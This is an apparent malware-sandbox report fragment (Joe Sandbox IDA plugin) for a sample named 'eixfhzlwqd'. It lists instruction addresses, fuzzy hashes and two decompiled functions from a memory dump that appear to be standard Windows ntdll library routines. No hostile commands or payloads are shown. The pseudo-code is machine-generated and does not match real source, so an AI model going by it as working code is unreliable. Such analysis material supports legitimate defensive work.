                                                              0x00a9bdda
                                                              0x00000000
                                                              0x00a9bdda
                                                              0x00a5fb64
                                                              0x00a5fb64
                                                              0x00a5fb64
                                                              0x00a5fb67
                                                              0x00a5fb6e
                                                              0x00a5fb70
                                                              0x00a5fb72
                                                              0x00000000
                                                              0x00a5fb78
                                                              0x00a5fb7a
                                                              0x00a5fb7a
                                                              0x00a5fb7d
                                                              0x00a5fb80
                                                              0x00a9bddf
                                                              0x00a9bde1
                                                              0x00000000
                                                              0x00a9bde3
                                                              0x00000000
                                                              0x00a9bde3
                                                              0x00a5fb86
                                                              0x00a5fb86
                                                              0x00a5fb86
                                                              0x00a5fb8b
                                                              0x00a5fb90
                                                              0x00a5fb92
                                                              0x00a5fb94
                                                              0x00a5fb9a
                                                              0x00a5fb9b
                                                              0x00a5fba1
                                                              0x00a9bde8
                                                              0x00a9bdeb
                                                              0x00a9bded
                                                              0x00a9beb5
                                                              0x00a9beb5
                                                              0x00a9bebb
                                                              0x00a9bebd
                                                              0x00a9bec3
                                                              0x00a9bed2
                                                              0x00a9bedd
                                                              0x00a9bedd
                                                              0x00a9beed
                                                              0x00000000
                                                              0x00a9bdf3
                                                              0x00a9bdfe
                                                              0x00a9be06
                                                              0x00a9be0b
                                                              0x00a9be0d
                                                              0x00a9be0f
                                                              0x00a9be14
                                                              0x00a9be19
                                                              0x00a9be20
                                                              0x00a9be25
                                                              0x00a9be27
                                                              0x00a9be35
                                                              0x00a9be39
                                                              0x00a9be46
                                                              0x00a9be4f
                                                              0x00a9be54
                                                              0x00a9be56
                                                              0x00a9bef8
                                                              0x00a9bef8
                                                              0x00000000
                                                              0x00a9be5c
                                                              0x00a9be5c
                                                              0x00a9be60
                                                              0x00000000
                                                              0x00a9be66
                                                              0x00a9be66
                                                              0x00a9be7f
                                                              0x00a9be84
                                                              0x00a9be87
                                                              0x00a9be89
                                                              0x00a9be8b
                                                              0x00a9be99
                                                              0x00a9be9d
                                                              0x00a9bea0
                                                              0x00a9beac
                                                              0x00a9beaf
                                                              0x00a9beb1
                                                              0x00a9beb3
                                                              0x00a9beb3
                                                              0x00000000
                                                              0x00a9bea2
                                                              0x00a9bea2
                                                              0x00000000
                                                              0x00a9bea2
                                                              0x00a9be8d
                                                              0x00a9be8d
                                                              0x00a9be92
                                                              0x00000000
                                                              0x00a9be92
                                                              0x00a9be8b
                                                              0x00a9be60
                                                              0x00a9be3b
                                                              0x00a9be3b
                                                              0x00a9be3e
                                                              0x00000000
                                                              0x00a9be40
                                                              0x00a9be40
                                                              0x00a9be44
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9be44
                                                              0x00a9be3e
                                                              0x00a9be29
                                                              0x00a9be29
                                                              0x00000000
                                                              0x00a9be29
                                                              0x00a9be27
                                                              0x00000000
                                                              0x00a5fba7
                                                              0x00a5fba7
                                                              0x00a5fbab
                                                              0x00a9bf02
                                                              0x00a5fbb1
                                                              0x00a5fbb1
                                                              0x00a5fbb8
                                                              0x00a5fbbd
                                                              0x00a5fbbd
                                                              0x00a5fbbf
                                                              0x00a5fbbf
                                                              0x00a5fbc5
                                                              0x00a5fbcb
                                                              0x00a5fbf8
                                                              0x00a5fbf8
                                                              0x00a5fbfa
                                                              0x00000000
                                                              0x00a5fc00
                                                              0x00a5fc00
                                                              0x00a5fc03
                                                              0x00000000
                                                              0x00a5fc09
                                                              0x00a5fc09
                                                              0x00a5fc0f
                                                              0x00a5fc15
                                                              0x00a5fc23
                                                              0x00a5fc23
                                                              0x00a5fc25
                                                              0x00a5fc27
                                                              0x00a5fc75
                                                              0x00a5fc7c
                                                              0x00a5fc84
                                                              0x00000000
                                                              0x00a5fc29
                                                              0x00a5fc29
                                                              0x00a5fc2d
                                                              0x00a5fc30
                                                              0x00a9bf0f
                                                              0x00000000
                                                              0x00a5fc36
                                                              0x00a5fc38
                                                              0x00a5fc3b
                                                              0x00a5fc41
                                                              0x00a9bf17
                                                              0x00a9bf19
                                                              0x00a9bf48
                                                              0x00a9bf4b
                                                              0x00000000
                                                              0x00a9bf1b
                                                              0x00a9bf22
                                                              0x00a9bf24
                                                              0x00a9bf26
                                                              0x00000000
                                                              0x00a9bf2c
                                                              0x00a9bf37
                                                              0x00a9bf39
                                                              0x00a9bf3b
                                                              0x00000000
                                                              0x00a9bf41
                                                              0x00a9bf41
                                                              0x00a9bf41
                                                              0x00a9bf41
                                                              0x00a9bf45
                                                              0x00000000
                                                              0x00a9bf45
                                                              0x00a9bf3b
                                                              0x00a9bf26
                                                              0x00000000
                                                              0x00a5fc47
                                                              0x00a5fc47
                                                              0x00a5fc49
                                                              0x00a5fcb2
                                                              0x00a5fcb4
                                                              0x00a5fcb6
                                                              0x00a5fcdc
                                                              0x00a5fcdc
                                                              0x00000000
                                                              0x00a5fcb8
                                                              0x00a5fcc3
                                                              0x00a5fcc5
                                                              0x00a5fcc7
                                                              0x00000000
                                                              0x00a5fcc9
                                                              0x00a5fcc9
                                                              0x00a5fccd
                                                              0x00000000
                                                              0x00a5fccd
                                                              0x00a5fcc7
                                                              0x00000000
                                                              0x00a5fc4b
                                                              0x00a5fc4b
                                                              0x00a5fc4e
                                                              0x00a5fc4e
                                                              0x00a5fc51
                                                              0x00a5fc51
                                                              0x00a5fc54
                                                              0x00a5fc5a
                                                              0x00a5fc5c
                                                              0x00a5fc5f
                                                              0x00a5fc61
                                                              0x00a5fc63
                                                              0x00a5fc65
                                                              0x00a5fc67
                                                              0x00a5fc6e
                                                              0x00a5fc72
                                                              0x00a5fc72
                                                              0x00a5fc72
                                                              0x00a5fc72
                                                              0x00a5fc67
                                                              0x00a5fc61
                                                              0x00000000
                                                              0x00a5fc5a
                                                              0x00a5fc49
                                                              0x00a5fc41
                                                              0x00a5fc30
                                                              0x00a5fc27
                                                              0x00a5fc03
                                                              0x00a5fbcd
                                                              0x00a5fbd3
                                                              0x00a5fbd9
                                                              0x00a5fbdc
                                                              0x00a5fbde
                                                              0x00a5fc99
                                                              0x00a5fc9b
                                                              0x00a5fc9d
                                                              0x00a5fcd5
                                                              0x00a5fcd5
                                                              0x00a5fc89
                                                              0x00a5fc89
                                                              0x00000000
                                                              0x00a5fc9f
                                                              0x00a5fc9f
                                                              0x00a5fca3
                                                              0x00000000
                                                              0x00a5fca3
                                                              0x00000000
                                                              0x00a5fbe4
                                                              0x00a5fbe4
                                                              0x00a5fbe4
                                                              0x00a5fbe4
                                                              0x00a5fbe9
                                                              0x00a5fbf2
                                                              0x00000000
                                                              0x00a5fbf2
                                                              0x00a5fbde
                                                              0x00a5fbcb
                                                              0x00a5fbab
                                                              0x00a5fc8b
                                                              0x00a5fc8b
                                                              0x00a5fc8c
                                                              0x00a5fb80
                                                              0x00a5fb72
                                                              0x00a5fb5e
                                                              0x00a5fc8d
                                                              0x00a5fc91
                                                              0x00a5fadf
                                                              0x00a5fadf
                                                              0x00a5fae1
                                                              0x00a5fae4
                                                              0x00a5fae7
                                                              0x00a5faec
                                                              0x00a5faf8
                                                              0x00a5fb00
                                                              0x00a5fb07
                                                              0x00a5fb0f
                                                              0x00a5fb0f
                                                              0x00a5fb07
                                                              0x00000000
                                                              0x00a5faf8
                                                              0x00a5fadd

                                                              Strings
                                                              • 1M, xrefs: 00A5FAF1
                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A9BE0F
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!$1M
                                                              • API String ID: 0-548562668
                                                              • Opcode ID: d2479533d44458f3ee7eb39f64173b5f914f9646a5c217195aa255b1121c8d80
                                                              • Instruction ID: 3b04aa6e42348b08d28918bab2f3050f14c2977c03a740bea8445d9b53f8c06a
                                                              • Opcode Fuzzy Hash: d2479533d44458f3ee7eb39f64173b5f914f9646a5c217195aa255b1121c8d80
                                                              • Instruction Fuzzy Hash: 6DA1EF71B0060ADFDB25DB68C950BAAB3F5BF48712F14457AEC06CB690EB30DC498B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AA51BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00AA51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xb005f0);
				E00A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00A3EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00AA53CA(0);
						return E00A7D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00A6F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00A43690(1, _t117, 0xa01810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00A6AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00A44620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00A6AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00AA500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00A69860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                              0x00aa51be
                                                              0x00aa51c3
                                                              0x00aa51c8
                                                              0x00aa51cd
                                                              0x00aa51d0
                                                              0x00aa51d3
                                                              0x00aa51d8
                                                              0x00aa51db
                                                              0x00aa51de
                                                              0x00aa51e0
                                                              0x00aa51e3
                                                              0x00aa51e6
                                                              0x00aa51e8
                                                              0x00aa5342
                                                              0x00aa5351
                                                              0x00aa5356
                                                              0x00aa535a
                                                              0x00aa5360
                                                              0x00aa5363
                                                              0x00aa5366
                                                              0x00aa5369
                                                              0x00aa5369
                                                              0x00aa536b
                                                              0x00aa536b
                                                              0x00aa5370
                                                              0x00aa53a3
                                                              0x00aa53a4
                                                              0x00aa53a6
                                                              0x00aa53ab
                                                              0x00aa53ab
                                                              0x00aa53ae
                                                              0x00aa53ae
                                                              0x00aa53b5
                                                              0x00aa53bf
                                                              0x00aa53bf
                                                              0x00aa5375
                                                              0x00aa5396
                                                              0x00aa53a0
                                                              0x00aa53a0
                                                              0x00000000
                                                              0x00aa5396
                                                              0x00aa5377
                                                              0x00aa5379
                                                              0x00aa537f
                                                              0x00aa538c
                                                              0x00aa5390
                                                              0x00000000
                                                              0x00aa5390
                                                              0x00aa51ee
                                                              0x00aa51f1
                                                              0x00aa5301
                                                              0x00aa5310
                                                              0x00aa5315
                                                              0x00aa5318
                                                              0x00aa531b
                                                              0x00aa5320
                                                              0x00aa532e
                                                              0x00aa5331
                                                              0x00000000
                                                              0x00aa5331
                                                              0x00aa5328
                                                              0x00aa5329
                                                              0x00000000
                                                              0x00aa5329
                                                              0x00aa51fa
                                                              0x00aa5235
                                                              0x00aa5236
                                                              0x00aa5239
                                                              0x00aa523f
                                                              0x00aa5240
                                                              0x00aa5241
                                                              0x00aa5242
                                                              0x00aa5246
                                                              0x00aa5247
                                                              0x00aa524e
                                                              0x00aa5251
                                                              0x00aa5267
                                                              0x00aa5269
                                                              0x00aa526e
                                                              0x00aa527d
                                                              0x00aa527e
                                                              0x00aa5281
                                                              0x00aa5282
                                                              0x00aa5287
                                                              0x00aa5288
                                                              0x00aa528a
                                                              0x00aa528f
                                                              0x00aa5294
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa529a
                                                              0x00aa529c
                                                              0x00aa529e
                                                              0x00aa529e
                                                              0x00aa52a4
                                                              0x00aa52b0
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa52ba
                                                              0x00aa52bc
                                                              0x00aa52bc
                                                              0x00aa52d4
                                                              0x00aa52d9
                                                              0x00aa52dc
                                                              0x00aa52e1
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa52e7
                                                              0x00aa52f4
                                                              0x00000000
                                                              0x00aa52f4
                                                              0x00aa5270
                                                              0x00000000
                                                              0x00aa5270
                                                              0x00aa51fc
                                                              0x00aa51fd
                                                              0x00aa5202
                                                              0x00aa5203
                                                              0x00aa5205
                                                              0x00aa520a
                                                              0x00aa520f
                                                              0x00000000
                                                              0x00000000
                                                              0x00aa521b
                                                              0x00aa5226
                                                              0x00aa522b
                                                              0x00aa521d
                                                              0x00aa521d
                                                              0x00aa5222
                                                              0x00aa5222
                                                              0x00aa522d
                                                              0x00000000

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 0bd7b32091c889342af1695114c236be62449e2dd8ad8729be820164bff14430
                                                              • Instruction ID: 4ec0c0b5d050f7e04260e57ca21342ced279d234b8a6c151909ffbff0f323b4f
                                                              • Opcode Fuzzy Hash: 0bd7b32091c889342af1695114c236be62449e2dd8ad8729be820164bff14430
                                                              • Instruction Fuzzy Hash: 09516D71E00A089FDB24DFA8C950BAEBBF8BF89740F14402DE509EB291D771D901CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 78%
                                                              			E00A2B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xaff7a8);
				E00A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E00A7D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00A6D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00A6F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L00A7DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00A6B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00A6B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00A6E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00A6A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                              0x00a2b171
                                                              0x00a2b171
                                                              0x00a2b171
                                                              0x00a2b171
                                                              0x00a2b171
                                                              0x00a2b176
                                                              0x00a2b17b
                                                              0x00a2b180
                                                              0x00a2b186
                                                              0x00a2b18f
                                                              0x00a2b198
                                                              0x00a2b1a4
                                                              0x00a2b1aa
                                                              0x00a84802
                                                              0x00a84802
                                                              0x00a84805
                                                              0x00a8480c
                                                              0x00a8480e
                                                              0x00a2b1d1
                                                              0x00a2b1d3
                                                              0x00a2b1de
                                                              0x00a2b1de
                                                              0x00a84817
                                                              0x00a8481e
                                                              0x00a84820
                                                              0x00a84822
                                                              0x00a84822
                                                              0x00a84824
                                                              0x00a84824
                                                              0x00a8482a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a84835
                                                              0x00a8483a
                                                              0x00a8483d
                                                              0x00a8483f
                                                              0x00a84842
                                                              0x00a84842
                                                              0x00a84842
                                                              0x00a84846
                                                              0x00a8484c
                                                              0x00a8484e
                                                              0x00a84851
                                                              0x00a84851
                                                              0x00a84853
                                                              0x00a84854
                                                              0x00a84854
                                                              0x00a84858
                                                              0x00a8485a
                                                              0x00a8485a
                                                              0x00a8485d
                                                              0x00a8485f
                                                              0x00a84861
                                                              0x00a84861
                                                              0x00a84866
                                                              0x00a8486b
                                                              0x00a8486e
                                                              0x00a84871
                                                              0x00a84876
                                                              0x00a84876
                                                              0x00a84878
                                                              0x00a8487b
                                                              0x00a84884
                                                              0x00a84884
                                                              0x00000000
                                                              0x00a8487d
                                                              0x00a8487d
                                                              0x00a84882
                                                              0x00a84889
                                                              0x00a84889
                                                              0x00a8488f
                                                              0x00a84891
                                                              0x00a848e0
                                                              0x00a848e2
                                                              0x00a848e4
                                                              0x00a848e4
                                                              0x00a848e7
                                                              0x00a848e7
                                                              0x00a848ed
                                                              0x00a848f4
                                                              0x00a848f6
                                                              0x00a84951
                                                              0x00a84951
                                                              0x00a84953
                                                              0x00a84953
                                                              0x00a84956
                                                              0x00a84956
                                                              0x00a84958
                                                              0x00a84959
                                                              0x00a84959
                                                              0x00a8495d
                                                              0x00a8495d
                                                              0x00a8495f
                                                              0x00a8495f
                                                              0x00a84965
                                                              0x00a84969
                                                              0x00a849ba
                                                              0x00a849ba
                                                              0x00a849c1
                                                              0x00a849c5
                                                              0x00a849cc
                                                              0x00a849d4
                                                              0x00a849d7
                                                              0x00a849da
                                                              0x00a849e4
                                                              0x00a849e5
                                                              0x00a849f3
                                                              0x00a84a02
                                                              0x00000000
                                                              0x00a84a02
                                                              0x00a84972
                                                              0x00a84974
                                                              0x00000000
                                                              0x00000000
                                                              0x00a84976
                                                              0x00a84979
                                                              0x00a84982
                                                              0x00a84983
                                                              0x00a84984
                                                              0x00a8498b
                                                              0x00a8498d
                                                              0x00a84991
                                                              0x00a84993
                                                              0x00a84999
                                                              0x00a8499d
                                                              0x00a849a2
                                                              0x00a849a2
                                                              0x00a849a2
                                                              0x00a84999
                                                              0x00a849ac
                                                              0x00000000
                                                              0x00a849b3
                                                              0x00a848f8
                                                              0x00a848fe
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a848fe
                                                              0x00a84895
                                                              0x00a8489c
                                                              0x00a848ad
                                                              0x00a848b2
                                                              0x00a848b5
                                                              0x00a848b7
                                                              0x00a848ba
                                                              0x00a848bc
                                                              0x00a848c6
                                                              0x00a848c6
                                                              0x00a848cb
                                                              0x00a848d1
                                                              0x00a848d4
                                                              0x00a848d8
                                                              0x00a848d8
                                                              0x00000000
                                                              0x00a848d8
                                                              0x00a848be
                                                              0x00a848c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00a848c2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a848c4
                                                              0x00000000
                                                              0x00a84882
                                                              0x00a8487b
                                                              0x00a84904
                                                              0x00a84906
                                                              0x00000000
                                                              0x00000000
                                                              0x00a84908
                                                              0x00a8490e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a84910
                                                              0x00a84917
                                                              0x00a84917
                                                              0x00000000
                                                              0x00a84917
                                                              0x00a2b1ba
                                                              0x00a847f9
                                                              0x00a847fc
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a847fc
                                                              0x00a2b1c0
                                                              0x00a2b1c0
                                                              0x00a2b1c3
                                                              0x00a2b1cb
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: _vswprintf_s
                                                              • String ID:
                                                              • API String ID: 677850445-0
                                                              • Opcode ID: a802a06ab1b873e44d0d42f6e63ab0634ff00dd129dab4cd62d70979d34a86cd
                                                              • Instruction ID: 8077f88a26e221547e49e26996850bda91679d8220f69213a65fb886c18df871
                                                              • Opcode Fuzzy Hash: a802a06ab1b873e44d0d42f6e63ab0634ff00dd129dab4cd62d70979d34a86cd
                                                              • Instruction Fuzzy Hash: 0851E471D1026A8FDF31EF68C945BAEBBB0BF08710F2142ADE859AB281D7704D418B91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

